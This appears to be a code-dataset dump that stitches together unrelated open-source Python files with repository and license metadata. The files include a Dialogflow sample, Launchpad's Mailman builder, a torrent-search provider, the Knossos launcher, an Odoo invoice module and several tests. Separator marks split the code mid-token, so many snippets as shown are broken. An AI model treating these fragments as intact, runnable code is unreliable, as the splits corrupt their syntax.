entity_type_text = serializers.CharField(source='get_entity_type_display', read_only=True)
organization = serializers.SerializerMethodField()
select_url = serializers.SerializerMethodField()
def get_organization(self, obj):
return str(obj.entity.organization)
def get_select_url(self, obj):
return reverse(
"entity_read",
kwargs={'entity_version_id': obj.id}
)
|
googleapis/python-dialogflow
|
samples/generated_samples/dialogflow_generated_dialogflow_v2_documents_delete_document_async.py
|
Python
|
apache-2.0
| 1,580 | 0.000633 |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
|
#
# Snippet for DeleteDocument
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-dialogflow
# [START dialogflow_generated_dialogflow_v2_Documents_DeleteDocument_async]
from google.cloud import dialogflow_v2
async def sample_delete_documen
|
t():
# Create a client
client = dialogflow_v2.DocumentsAsyncClient()
# Initialize request argument(s)
request = dialogflow_v2.DeleteDocumentRequest(
name="name_value",
)
# Make the request
operation = client.delete_document(request=request)
print("Waiting for operation to complete...")
response = await operation.result()
# Handle the response
print(response)
# [END dialogflow_generated_dialogflow_v2_Documents_DeleteDocument_async]
|
rahulbohra/Python-Basic
|
35_sum_count_avg_by_user_input.py
|
Python
|
mit
| 454 | 0.002203 |
count = 0
total = 0
average = 0
while True:
inputNumber = raw_input('Enter a number
|
: ')
# Edge Cases
if inputNumber == 'done':
break
if len(inputNumber) < 1:
break
# Logical work
try:
number = float(inputNumber)
except:
print
|
'Invalid Number'
continue
count = count + 1
total = total + number
print 'Count Total\n', count, total
average = total / count
print average
|
abramhindle/UnnaturalCodeFork
|
python/testdata/launchpad/buildmailman.py
|
Python
|
agpl-3.0
| 7,591 | 0 |
#! /usr/bin/python
#
# Copyright 2009, 2010 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
import errno
import grp
import os
import pwd
import socket
import subprocess
import sys
import tempfile
from lazr.config import as_username_groupname
from lp.services.config import config
from lp.services.mailman.config import (
configure_prefix,
configure_siteowner,
)
from lp.services.mailman.monkeypatches import monkey_patch
basepath = [part for part in sys.path if part]
def build_mailman():
# Build and install Mailman if it is enabled and not yet built.
if not config.mailman.build:
# There's nothing to do.
return 0
mailman_path = configure_prefix(config.mailman.build_prefix)
mailman_bin = os.path.join(mailman_path, 'bin')
var_dir = os.path.abspath(config.mailman.build_var_dir)
# If we can import the package, we assume Mailman is properly built at
# the least. This does not catch re-installs that might be necessary
# should our copy in sourcecode be updated. Do that manually.
sys.path.append(mailman_path)
try:
import Mailman
except ImportError:
# sys.path_importer_cache is a mapping of elements of sys.path to
# importer objects used to handle them. In Python2.5+ when an element
# of sys.path is found to not exist on disk, a NullImporter is created
# and cached - this causes Python to never bother re-inspecting the
# disk for that path element. We must clear that cache element so that
# our second attempt to import MailMan after building it will actually
# check the disk.
del sys.path_importer_cache[mailman_path]
need_build = need_install = True
else:
need_build = need_install = False
# Also check for Launchpad-specific bits stuck into the source tree by
# monkey_patch(), in case this is half-installed. See
# <https://bugs.launchpad.net/launchpad-registry/+bug/683486>.
try:
from Mailman.Queue import XMLRPCRunner
from Mailman.Handlers import LPModerate
except ImportError:
# Monkey patches not present, redo install and patch steps.
need_install = True
# Make sure the target directories exist and have the correct
# permissions, otherwise configure will complain.
user, group = as_username_groupname(config.mailman.build_user_group)
# Now work backwards to get the uid and gid
try:
uid = pwd.getpwnam(user).pw_uid
except KeyError:
print >> sys.stderr, 'No user found:', user
sys.exit(1)
try:
gid = grp.getgrnam(group).gr_gid
except KeyError:
print >> sys.stderr, 'No group found:', group
sys.exit(1)
# Ensure that the var_dir exists, is owned by the user:group, and has
# the necessary permissions. Set the mode separately after the
# makedirs() call because some platforms ignore mkdir()'s mode (though
# I think Linux does not ignore it -- better safe than sorry).
try:
os.makedirs(var_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
else:
# Just created the var directory, will need to install mailmain bits.
need_install = True
os.chown(var_dir, uid, gid)
os.chmod(var_dir, 02775)
# Skip mailman setup if nothing so far has shown a reinstall needed.
if not need_install:
return 0
mailman_source = os.path.join('sourcecode', 'mailman')
if config.mailman.build_host_name:
build_host_name = config.mailman.build_host_name
else:
build_host_name = socket.getfqdn()
# Build and install the Mailman software. Note that we don't care about
# --with-cgi-gid because we're not going to use that Mailman subsystem.
executable = os.path.abspath('bin/py')
configure_args = (
'./configure',
'--prefix', mailman_path,
'--with-var-prefix=' + var_dir,
'--with-python=' + executable,
'--with-username=' + user,
'--with-groupname=' + group,
'--with-mail-gid=' + group,
'--with-mailhost=' + build_host_name,
'--with-urlhost=' + build_host_name,
)
if need_build:
# Configure.
retcode = subprocess.call(configure_args, cwd=mailman_source)
if retcode:
print >> sys.stderr, 'Could not configure Mailman:'
sys.exit(retcode)
# Make.
retcode = subprocess.call(('make',
|
), cwd=mailman_source)
if retcode:
|
print >> sys.stderr, 'Could not make Mailman.'
sys.exit(retcode)
retcode = subprocess.call(('make', 'install'), cwd=mailman_source)
if retcode:
print >> sys.stderr, 'Could not install Mailman.'
sys.exit(retcode)
# Try again to import the package.
try:
import Mailman
except ImportError:
print >> sys.stderr, 'Could not import the Mailman package'
return 1
# Check to see if the site list exists. The output can go to /dev/null
# because we don't really care about it. The site list exists if
# config_list returns a zero exit status, otherwise it doesn't
# (probably). Before we can do this however, we must monkey patch
# Mailman, otherwise mm_cfg.py won't be set up correctly.
monkey_patch(mailman_path, config)
import Mailman.mm_cfg
retcode = subprocess.call(
('./config_list', '-o', '/dev/null',
Mailman.mm_cfg.MAILMAN_SITE_LIST),
cwd=mailman_bin,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if retcode:
addr, password = configure_siteowner(
config.mailman.build_site_list_owner)
# The site list does not yet exist, so create it now.
retcode = subprocess.call(
('./newlist', '--quiet',
'--emailhost=' + build_host_name,
Mailman.mm_cfg.MAILMAN_SITE_LIST,
addr, password),
cwd=mailman_bin)
if retcode:
print >> sys.stderr, 'Could not create site list'
return retcode
retcode = configure_site_list(
mailman_bin, Mailman.mm_cfg.MAILMAN_SITE_LIST)
if retcode:
print >> sys.stderr, 'Could not configure site list'
return retcode
# Create a directory to hold the gzip'd tarballs for the directories of
# deactivated lists.
try:
os.mkdir(os.path.join(Mailman.mm_cfg.VAR_PREFIX, 'backups'))
except OSError as e:
if e.errno != errno.EEXIST:
raise
return 0
def configure_site_list(mailman_bin, site_list_name):
"""Configure the site list.
Currently, the only thing we want to set is to not advertise the
site list.
"""
fd, config_file_name = tempfile.mkstemp()
try:
os.close(fd)
config_file = open(config_file_name, 'w')
try:
print >> config_file, 'advertised = False'
finally:
config_file.close()
return subprocess.call(
('./config_list', '-i', config_file_name, site_list_name),
cwd=mailman_bin)
finally:
os.remove(config_file_name)
def main():
# setting python paths
program = sys.argv[0]
src = 'lib'
here = os.path.dirname(os.path.abspath(program))
srcdir = os.path.join(here, src)
sys.path = [srcdir, here] + basepath
return build_mailman()
if __name__ == '__main__':
return_code = main()
sys.exit(return_code)
|
LLNL/spack
|
var/spack/repos/builtin/packages/r-rots/package.py
|
Python
|
lgpl-2.1
| 1,117 | 0.000895 |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class RRots(RPackage):
"""Reproducibility-Optimized Test Statistic
Calculates the Reproducibility-Optimized Test Statistic (ROTS) for
differential testing in omics data."""
homepage = "https://bioconductor.org/packages/ROTS"
git = "https://git.bioconductor.org/packages/ROTS.git"
version('1.18.0', commit='1d4e206a8ce68d5a1417ff51c26174ed9d0ba7d2')
version('1.12.0', commit='7e2c96fd8fd36710321498745f24cc6b5
|
9ac02f0')
version('1.10.1', commit='1733d3f868cef4d81af6edfc102221d80793937b')
version('1.8.0', com
|
mit='02e3c6455bb1afe7c4cc59ad6d4d8bae7b01428b')
version('1.6.0', commit='3567ac1142ba97770b701ee8e5f9e3e6c781bd56')
version('1.4.0', commit='2e656514a4bf5a837ee6e14ce9b28a61dab955e7')
depends_on('r@3.3:', type=('build', 'run'))
depends_on('r-rcpp', type=('build', 'run'))
depends_on('r-biobase', type=('build', 'run'))
|
chetan/cherokee
|
admin/market/ows_consts.py
|
Python
|
gpl-2.0
| 1,407 | 0.012082 |
# -*- coding: utf-8 -*-
#
# Cherokee-admin
#
# Authors:
# Alvaro Lopez Ortega <alvaro@alobbs.com>
#
# Copyright (C) 2001-2010 Alvaro Lopez Ortega
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 2 of the GNU General Public
# License as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have rece
|
ived a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
from consts import *
from configured import *
OWS_STATIC = 'http://cherokee-market.com'
OWS_APPS = 'http://www.octality.com/api/v%s/open/market/apps/' %(OWS_API_VERSION)
OWS_APPS_AUTH = 'http://www.octality.com/api/v%s/market/apps/' %(OWS_API_VERSION)
OWS_APPS_INSTALL = 'http://
|
www.octality.com/api/v%s/market/install/' %(OWS_API_VERSION)
OWS_DEBUG = True
URL_MAIN = '/market'
URL_APP = '/market/app'
URL_SEARCH = '/market/search'
URL_SEARCH_APPLY = '/market/search/apply'
URL_CATEGORY = '/market/category'
URL_REVIEW = '/market/review'
|
elit3ge/SickRage
|
sickbeard/providers/kat.py
|
Python
|
gpl-3.0
| 9,861 | 0.003752 |
# coding=utf-8
# Author: Mr_Orange <mr_orange@hotmail.it>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import traceback
import re
import datetime
import xmltodict
import sickbeard
from sickbeard.providers import generic
from sickbeard.common import Quality
from sickbeard import logger
from sickbeard import tvcache
from sickbeard import helpers
from sickbeard import db
from sickbeard import classes
from sickbeard.show_name_helpers import allPossibleShowNames, sanitizeSceneName
class KATProvider(generic.TorrentProvider):
def __init__(self):
generic.TorrentProvider.__init__(self, "KickAssTorrents")
self.supportsBacklog = True
self.public = True
self.enabled = False
self.confirmed = True
self.ratio = None
self.minseed = None
self.minleech = None
self.cache = KATCache(self)
self.urls = {
'base_url': 'https://kat.cr/',
'search': 'https://kat.cr/usearch/',
'rss': 'https://kat.cr/tv/',
}
self.url = self.urls['base_url']
self.search_params = {
'q': '',
'field': 'seeders',
'sorder': 'desc',
'rss': 1,
'category': 'tv'
}
def isEnabled(self):
return self.enabled
def imageName(self):
return 'kat.png'
def _get_season_search_strings(self, ep_obj):
search_string = {'Season': []}
for show_name in set(allPossibleShowNames(ep_obj.show)):
ep_string = sanitizeSceneName(show_name) + ' '
if ep_obj.show.air_by_date or ep_obj.show.sports:
ep_string += str(ep_obj.airdate).split('-')[0]
elif ep_obj.show.anime:
ep_string += "%02d" % ep_obj.scene_absolute_number
else:
ep_string = '%s S%02d -S%02dE category:tv' % (sanitizeSceneName(show_name), ep_obj.scene_season, ep_obj.scene_season) #1) showName SXX -SXXE
search_string['Season'].append(ep_string)
ep_string = '%s "Season %d" -Ep* category:tv' % (sanitizeSceneName(show_name), ep_obj.scene_season) # 2) showName "Season X"
search_string['Season'].append(ep_string)
return [search_string]
def _get_episode_search_strings(self, ep_obj, add_string=''):
search_string = {'Episode': []}
for show_name in set(allPossibleShowNames(ep_obj.show)):
ep_string = sanitizeSceneName(show_name) + ' '
if ep_obj.show.air_by_date:
ep_string += str(ep_obj.airdate).replace('-', ' ')
elif ep_obj.show.sports:
ep_string += str(ep_obj.airdate).replace('-', ' ') + '|' + ep_obj.airdate.strftime('%b')
elif ep_obj.show.anime:
ep_string += "%02d" % ep_obj.scene_absolute_number
else:
ep_string += sickbeard.config.naming_ep_type[2] % {'seasonnumber': ep_obj.scene_season,
'episodenumber': ep_obj.scene_episode} + '|' + \
sickbeard.config.naming_ep_type[0] % {'seasonnumber': ep_obj.scene_season,
'episodenumber': ep_obj.scene_episode}
if add_string:
ep_string += ' ' + add_string
search_string['Episode'].append(re.sub(r'\s+', ' ', ep_string.strip()))
return [search_string]
def _get_size(self, item):
#pylint: disable=W0612
title, url, info_hash, seeders, leechers, size, pubdate = item
return size or -1
def _doSearch(self, search_strings, search_mode='eponly', epcount=0, age=0, epObj=None):
results = []
items = {'Season': [], 'Episode': [], 'RSS': []}
for mode in search_strings.keys():
for search_string in search_strings[mode]:
self.search_params.update({'q': search_string, 'field': ('seeders', 'time_add')[mode == 'RSS']})
logger.log(u"Search string: %s" % unicode(self.search_params), logger.DEBUG)
try:
data = self.getURL(self.urls[('search', 'rss')[mode == 'RSS']], params=self.search_params)
if not data:
continue
entries = xmltodict.parse(data)
if not all([entries, 'rss' in entries, 'channel' in entries['rss'], 'item' in entries['rss']['channel']]):
continue
for it
|
em in entries['rss']['channel']['item']:
try:
title = item['title']
# Use the torcache link kat provides,
# unless it is not torcache or we are not using blackhole
# because we want to use magnets if connecting direct to client
# so that proxies work.
|
url = item['enclosure']['@url']
if sickbeard.TORRENT_METHOD != "blackhole" or 'torcache' not in url:
url = item['torrent:magnetURI']
seeders = int(item['torrent:seeds'])
leechers = int(item['torrent:peers'])
verified = bool(int(item['torrent:verified']) or 0)
size = int(item['torrent:contentLength'])
info_hash = item['torrent:infoHash']
#link = item['link']
except (AttributeError, TypeError, KeyError):
continue
# Dont let RSS add items with no seeders either -.-
if not seeders or seeders < self.minseed or leechers < self.minleech:
logger.log(u"Discarding torrent because it doesn't meet the minimum seeders or leechers: {0} (S:{1} L:{2})".format(title, seeders, leechers), logger.DEBUG)
continue
if self.confirmed and not verified:
logger.log(u"KAT Provider found result " + title + " but that doesn't seem like a verified result so I'm ignoring it", logger.DEBUG)
continue
if not title or not url:
continue
try:
pubdate = datetime.datetime.strptime(item['pubDate'], '%a, %d %b %Y %H:%M:%S +0000')
except Exception:
pubdate = datetime.datetime.today()
item = title, url, info_hash, seeders, leechers, size, pubdate
items[mode].append(item)
except Exception:
logger.log(u"Failed to parsing " + self.name + " Traceback: " + traceback.format_exc(),
logger.WARNING)
#For each search mode sort all the items by seeders
items[mode].sort(key=lambda tup: tup[3], reverse=True)
results += items[mode]
return results
def _get_title_and_url(self, item):
#pylint: disable=W0612
title, url, info_hash, seeders, leechers, size, pubdate = item
if title:
title = self._clean_title_from_provider(title)
if url:
url = url.replace('&', '&
|
mfwarren/django-mailer-2
|
django_mailer/constants.py
|
Python
|
mit
| 475 | 0 |
PRIORITY_EMAIL_NOW = 0
PRIORITY_HIGH = 1
PRIORITY_NORMAL = 3
PRIORITY_LOW = 5
RESULT_SENT = 0
RESULT_SKIPPED = 1
RESULT_FAILED = 2
PRIORITIES = {
'now': PRIORITY_EMAIL_NOW,
'high': PRIORI
|
TY_HIGH,
'normal': PRIORITY_NORMAL,
'low': PRIORITY_LOW,
}
PRIORITY_HEADER = 'X-Mail-Queue-Priority'
try:
from django.core.mail import get_connection
EMAIL_BACKEND_SUPPORT = True
except ImportError:
# Django version < 1.2
EMAIL_BACKEND_
|
SUPPORT = False
|
MjnMixael/knossos
|
knossos/launcher.py
|
Python
|
apache-2.0
| 12,595 | 0.003335 |
## Copyright 2017 Knossos authors, see NOTICE file
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from __future__ import absolute_import, print_function
import sys
import os
import logging
import subprocess
import time
import json
import traceback
import ssl
import six
from six.moves.urllib import parse as urlparse
logging.basicConfig(level=logging.DEBUG, format='%(levelname)s:%(threadName)s:%(module)s.%(funcName)s: %(message)s')
# We have to be in the correct directory *before* we import clibs so we're going to do this as early as possible.
if hasattr(sys, 'frozen'):
if hasattr(sys, '_MEIPASS'):
os.chdir(sys._MEIPASS)
else:
os.chdir(os.path.dirname(sys.executable))
else:
my_path = os.path.dirname(__file__)
if my_path != '':
os.chdir(my_path)
from . import uhf
uhf(__name__)
from . import center
# Initialize the FileHandler early to capture all log messages.
if not os.path.isdir(center.settings_path):
os.makedirs(center.settings_path)
# We truncate the log file on every start to avoid filling the user's disk with useless data.
log_path = os.path.join(center.settings_path, 'log.txt')
try:
if os.path.isfile(log_path):
os.unlink(log_path)
except Exception:
# This will only be visible if the user is running a console version.
logging.exception('The log is in use by someone!')
else:
handler = logging.FileHandler(log_path, 'w')
handler.setFormatter(logging.Formatter('%(levelname)s:%(threadName)s:%(module)s.%(funcName)s: %(message)s'))
handler.setLevel(logging.DEBUG)
logging.getLogger().addHandler(handler)
if not center.DEBUG:
logging.getLogger().setLevel(logging.INFO)
if six.PY2:
from . import py2_compat # noqa
from .qt import QtCore, QtGui, QtWidgets, variant as qt_variant
from . import util, ipc, auto_fetch
app = None
ipc_conn = None
translate = QtCore.QCoreApplication.translate
def my_excepthook(type, value, tb):
try:
# NOTE: This can fail (for some reason) in traceback.print_exception.
logging.error('UNCAUGHT EXCEPTION!', exc_info=(type, value, tb))
except Exception:
logging.error('UNCAUGHT EXCEPTION!\n%s%s: %s' % (''.join(traceback.format_tb(tb)), type.__name__, value))
msg = translate('launcher', 'A critical error occurred! Knossos might not work correctly until you restart it.')
if center.raven:
msg += '\n' + translate('launcher', 'The error has been reported and will hopefully be fixed soon.')
msg += '\n' + translate('launcher', 'If you want to help, report this bug on our Discord channel, ' +
'in the HLP thread or on GitHub. Just click a button below to open the relevant page.')
try:
box = QtWidgets.QMessageBox(QtWidgets.QMessageBox.Critical, 'Knossos', msg, QtWidgets.QMessageBox.Ok)
discord = box.addButton('Open Discord', QtWidgets.QMessageBox.ActionRole)
hlp = box.addButton('Open HLP Thread', QtWidgets.QMessageBox.ActionRole)
github = box.addButton('Open GitHub Issues', QtWidgets.QMessageBox.ActionRole)
box.exec_()
choice = box.clickedButton()
url = None
if choice == discord:
url = 'https://discord.gg/qfReB8t'
elif choice == hlp:
url = 'https://www.hard-light.net/forums/index.php?topic=94068.0'
elif choice == github:
url = 'https://github.com/ngld/knossos/issues'
if url:
QtGui.QDesktopServices.openUrl(QtCore.QUrl(url))
except Exception:
pass
def get_cmd(args=[]):
if hasattr(sys, 'frozen'):
my_path = [os.path.abspath(sys.executable)]
else:
my_path = [os.path.abspath(sys.executable), os.path.abspath('__main__.py')]
return my_path + args
def get_file_path(name):
if hasatt
|
r(sys, 'frozen') or os.path.isdir('data'):
return os.path.join('data', name)
else:
from pkg_resources import resource_filename
return resource_filename(__package__, name)
def load_settings():
spath = os.path.join(center.settings_path, 'settings.json')
settings = center.se
|
ttings
if os.path.exists(spath):
try:
with open(spath, 'r') as stream:
settings.update(json.load(stream))
except Exception:
logging.exception('Failed to load settings from "%s"!', spath)
# Migration
if 's_version' not in settings:
settings['s_version'] = 0
if settings['s_version'] < 6:
for name in ('mods', 'installed_mods', 'repos', 'nebula_link', 'nebula_web'):
if name in settings:
del settings[name]
settings['s_version'] = 6
else:
# Most recent settings version
settings['s_version'] = 6
if settings['hash_cache'] is not None:
util.HASH_CACHE = settings['hash_cache']
if settings['use_raven']:
util.enable_raven()
if settings['repos_override']:
center.REPOS = settings['repos_override']
if settings['api_override']:
center.API = settings['api_override']
if settings['web_override']:
center.WEB = settings['web_override']
if settings['debug_log']:
logging.getLogger().setLevel(logging.DEBUG)
util.ensure_tempdir()
return settings
def run_knossos():
global app
from .windows import HellWindow
center.app = app
center.main_win = HellWindow()
app.processEvents()
if sys.platform.startswith('win') and os.path.isfile('7z.exe'):
util.SEVEN_PATH = os.path.abspath('7z.exe')
elif sys.platform == 'darwin' and os.path.isfile('7z'):
util.SEVEN_PATH = os.path.abspath('7z')
translate = QtCore.QCoreApplication.translate
if not util.test_7z():
QtWidgets.QMessageBox.critical(None, 'Knossos', translate(
'launcher', 'I can\'t find "7z"! Please install it and run this program again.'))
return
util.DL_POOL.set_capacity(center.settings['max_downloads'])
if center.settings['download_bandwidth'] > 0.0:
util.SPEED_LIMIT_BUCKET.set_rate(center.settings['download_bandwidth'])
from . import repo, progress, integration
center.installed = repo.InstalledRepo()
center.pmaster = progress.Master()
center.pmaster.start_workers(10)
center.mods = repo.Repo()
center.auto_fetcher = auto_fetch.AutoFetcher()
# This has to run before we can load any mods!
repo.CPU_INFO = util.get_cpuinfo()
integration.init()
mod_db = os.path.join(center.settings_path, 'mods.json')
if os.path.isfile(mod_db):
try:
center.mods.load_json(mod_db)
except Exception:
logging.exception('Failed to load local mod list!')
center.mods.clear()
center.main_win.start_init()
app.exec_()
center.save_settings()
ipc.shutdown()
def handle_ipc_error():
global app, ipc_conn
logging.warning('Failed to connect to main process!')
if ipc_conn is not None:
ipc_conn.clean()
ipc_conn = None
def scheme_handler(link):
global app, ipc_conn
if not link.startswith(('fs2://', 'fso://')):
# NOTE: fs2:// is deprecated, we don't tell anyone about it.
QtWidgets.QMessageBox.critical(None, 'Knossos',
translate('launcher', 'I don\'t know how to handle "%s"! I only know fso:// .') % (link))
app.quit()
return True
link = urlparse.unquote(link.strip()).split('/')
if len(link) < 3:
QtWidgets.QMessageBox.critical(None, 'Knossos', translate('launcher', 'Not enough arguments!'))
app.quit()
return True
if not ipc_co
|
Fatman13/gta_swarm
|
ctripmultiplus.py
|
Python
|
mit
| 1,017 | 0.013766 |
#!/usr/bin/env python
# coding=utf-8
import pprint
import csv
|
import click
import requests
import datetime as datetime
from datetime import date
from xml.etree import ElementTree as ET
import os
# from random import sample
import random
import json
# import logging
import subprocess
import glob
import time
@click.command()
@click.option('--days', default=10, type=int)
@click.opti
|
on('--span', default=5, type=int)
# @click.option('--duration', default=3, type=int)
# @click.option('--days', default=1, type=int)
def ctripmultiplus(days, span):
start_days = days
for i in range(span):
subprocess.call(['python', 'ctripplus.py', '--days', str(start_days + i*10)])
for i in range(3):
print('sleeping..')
time.sleep(1)
# newest = max(glob.iglob('output_Search_item_hr_*.csv'), key=os.path.getctime)
# subprocess.call(['python', 'sendmail.py', '--filename', 'output_hotel_ref_*.csv', '--title', 'Ctrip_hotel_ref'])
if __name__ == '__main__':
ctripmultiplus()
|
xkmato/casepro
|
casepro/cases/migrations/0022_delete_mesageaction.py
|
Python
|
bsd-3-clause
| 697 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from djan
|
go.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cases', '0021_migrate_case_contacts'),
('msgs', '0008_messageaction'),
]
operations = [
migrations.RemoveField(
model_name='messageaction',
name='created_by',
),
migrations.RemoveField(
model_name='messageaction',
name='label',
|
),
migrations.RemoveField(
model_name='messageaction',
name='org',
),
migrations.DeleteModel(
name='MessageAction',
),
]
|
pp-mo/iris
|
lib/iris/tests/unit/analysis/maths/test_divide.py
|
Python
|
lgpl-3.0
| 2,496 | 0 |
# Copyright Iris contributors
#
# This file is part of Iris and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
"""Unit tests for the :func:`iris.analysis.maths.divide` function."""
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
import numpy as np
import operator
from iris.analysis.maths import divide
from iris.cube import Cube
from iris.tests.unit.analysis.maths import (
CubeArithmeticBroadcastingTestMixin,
CubeArithmeticMaskingTestMixin,
CubeArithmeticCoordsTest,
)
@tests.skip_data
@tests.iristest_timing_decorator
class TestBroadcasting(
tests.IrisTest_nometa, CubeArithmeticBroadcastingTestMixin
):
@property
def data_op(self):
return operator.truediv
@property
def cube_func(self):
return divide
@tests.iristest_timing_decorator
class TestMasking(tests.IrisTest_nometa, CubeArithmeticMaskingTestMixin):
@property
def data_op(self):
return operator.truediv
@property
def cube_func(self):
return divide
def test_unmasked_div_zero(self):
# Ensure cube behaviour matches numpy operator behaviour for the
# handling of arrays containing 0.
dat_a = np.array([0.0, 0.0, 0.0, 0.0])
dat_b = np.array([2.0, 2.0, 2.0, 2.0])
cube_a = Cube(dat_a)
cube_b = Cube(dat_b)
com = self.data_op(dat_b, dat_a)
res = self.cube_func(cube_b, cube_a).data
self.assertArrayEqual(com, res)
def test_masked_div_zero(self):
# Ensure cube behaviour matches numpy operator behaviour for the
# handling of arrays containing 0.
dat_a = np.ma.array([0.0, 0.0, 0.0, 0.0], mask=False)
dat_b = n
|
p.ma.array([2.0, 2.0, 2.0, 2.0], mask=False)
cube_a = Cube(dat_a)
cube_b = Cube(dat_b)
com = self.data_op(dat_b, dat_a)
res = self.cube_func(cube_b, cube_a).data
self.assertMaskedArrayEqual(com, res, strict=True)
class TestCoordMatch(CubeArithmeticCoordsTest):
def test_no_match(self):
|
cube1, cube2 = self.SetUpNonMatching()
with self.assertRaises(ValueError):
divide(cube1, cube2)
def test_reversed_points(self):
cube1, cube2 = self.SetUpReversed()
with self.assertRaises(ValueError):
divide(cube1, cube2)
if __name__ == "__main__":
tests.main()
|
adamwen829/instapush-py
|
setup.py
|
Python
|
mit
| 894 | 0.025727 |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# vim:set shiftwidth=4 tabstop=4 expandtab textwidth=79:
import os
from setuptools import setup, find_packages
def get_version():
basedir = os.path.dirname(__file__)
with open(os.path.join(basedir, 'instapush/version.py')) as f:
locals = {}
exec(f.read(), locals)
return locals['VERSION']
raise RuntimeError('No version info found.')
setup(
name='instapush',
version = get_version(),
keywords = ('instapush', 'tools'),
description = 'a python wrap
|
per for instap
|
ush',
license = 'MIT License',
url = 'https://github.com/adamwen829/instapush-py',
author = 'Adam Wen',
author_email = 'adamwen829@gmail.com',
packages = find_packages(),
include_package_data = True,
platforms = 'any',
install_requires = ['requests']
)
|
stellaf/sales_rental
|
account_invoice_start_end_dates/models/account_invoice.py
|
Python
|
gpl-3.0
| 3,875 | 0 |
# -*- coding: utf-8 -*-
# © 2013-2016 Akretion (Alexis de Lattre <alexis.delattre@akretion.com>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo import models, fields, api, _
from odoo.exceptions import ValidationError, UserError
class AccountInvoiceLine(models.Model):
_inherit = 'account.invoice.line'
start_date = fields.Date('Start Date')
end_date = fields.Date('End Date')
must_have_dates = fields.Boolean(
related='product_id.must_have_dates', readonly=True)
@api.multi
@api.constrains('start_date', 'end_date')
def _check_start_end_dates(self):
for invline in self:
if invline.start_date and not invline.end_date:
raise ValidationError(
_("Missing End Date for invoice line with "
"Description '%s'.")
% (invline.name))
if invline.end_date and not invline.start_date:
raise ValidationError(
_("Missing Start Date for invoice line with "
"Description '%s'.")
|
% (invline.name))
if invline.end_date and invline.start_date and \
invline.start_date > invline.end_date:
raise ValidationError(
_("Start Date should be before or be the same as "
"End Date for invoice line with Description
|
'%s'.")
% (invline.name))
# Note : we can't check invline.product_id.must_have_dates
# have start_date and end_date here, because it would
# block automatic invoice generation/import. So we do the check
# upon validation of the invoice (see below the function
# action_move_create)
class AccountInvoice(models.Model):
_inherit = 'account.invoice'
def inv_line_characteristic_hashcode(self, invoice_line):
"""Add start and end dates to hashcode used when the option "Group
Invoice Lines" is active on the Account Journal"""
code = super(AccountInvoice, self).inv_line_characteristic_hashcode(
invoice_line)
hashcode = '%s-%s-%s' % (
code,
invoice_line.get('start_date', 'False'),
invoice_line.get('end_date', 'False'),
)
return hashcode
@api.model
def line_get_convert(self, line, part):
"""Copy from invoice to move lines"""
res = super(AccountInvoice, self).line_get_convert(line, part)
res['start_date'] = line.get('start_date', False)
res['end_date'] = line.get('end_date', False)
return res
@api.model
def invoice_line_move_line_get(self):
"""Copy from invoice line to move lines"""
res = super(AccountInvoice, self).invoice_line_move_line_get()
ailo = self.env['account.invoice.line']
for move_line_dict in res:
iline = ailo.browse(move_line_dict['invl_id'])
move_line_dict['start_date'] = iline.start_date
move_line_dict['end_date'] = iline.end_date
return res
@api.multi
def action_move_create(self):
"""Check that products with must_have_dates=True have
Start and End Dates"""
for invoice in self:
for iline in invoice.invoice_line_ids:
if iline.product_id and iline.product_id.must_have_dates:
if not iline.start_date or not iline.end_date:
raise UserError(_(
"Missing Start Date and End Date for invoice "
"line with Product '%s' which has the "
"property 'Must Have Start and End Dates'.")
% (iline.product_id.name))
return super(AccountInvoice, self).action_move_create()
|
QualiSystems/shellfoundry
|
tests/test_utilities/config/test_config_record.py
|
Python
|
apache-2.0
| 5,062 | 0.001185 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
if sys.version_info >= (3, 0):
from unittest.mock import patch
else:
from mock import patch
from pyfakefs import fake_filesystem_unittest
from shellfoundry.utilities.config.config_context import ConfigContext
